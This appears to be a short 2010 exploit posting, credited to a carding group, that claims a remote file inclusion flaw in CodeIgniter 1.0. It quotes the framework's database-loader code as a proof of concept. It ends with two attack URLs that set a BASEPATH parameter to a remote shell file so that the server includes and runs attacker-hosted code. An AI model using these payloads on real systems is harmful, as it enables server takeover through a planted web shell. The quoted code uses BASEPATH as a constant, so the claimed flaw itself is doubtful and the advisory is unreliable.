CodeIgniter 1.0 Remote File Inclusion

`###########################################################  
### #  
### CodeIgniter v1.0 Remote File Inclusion Vulnerability #  
### #  
###########################################################  
###  
### * @package CodeIgniter  
### * @Version 1.0  
### * @license http://codeigniter.com/user_guide/license.html  
### * @link http://codeigniter.com  
###  
###########################################################  
###  
### Type : Remote File Inclusion Vulnerability  
### Author: eidelweiss  
### Date : 2010-02-13  
### Location: Indonesia ( http://yogyacarderlink.web.id )  
### Contact: g1xsystem [at] windowslive [dot] com  
### Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal (C)yber  
###  
###########################################################  
  
POC:  
require_once(BASEPATH.'database/DB_driver'.EXT);  
  
if ( ! isset($active_record) OR $active_record == TRUE)  
{  
require_once(BASEPATH.'database/DB_active_rec'.EXT);  
  
if ( ! class_exists('CI_DB'))  
{  
eval('class CI_DB extends CI_DB_active_record { }');  
}  
}  
else  
{  
if ( ! class_exists('CI_DB'))  
{  
eval('class CI_DB extends CI_DB_driver { }');  
}  
}  
  
require_once(BASEPATH.'database/drivers/'.$params['dbdriver'].'/'.$params['dbdriver'].'_driver'.EXT);  
  
// Instantiate the DB adapter  
$driver = 'CI_DB_'.$params['dbdriver'].'_driver';  
$DB =& instantiate_class(new $driver($params));  
  
if ($DB->autoinit == TRUE)  
{  
$DB->initialize();  
}  
  
return $DB;  
}  
  
###########################################################  
### Exploit: /system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]  
### /system/database/DB_driver.php?BASEPATH=[Shell.txt?]  
###########################################################  
`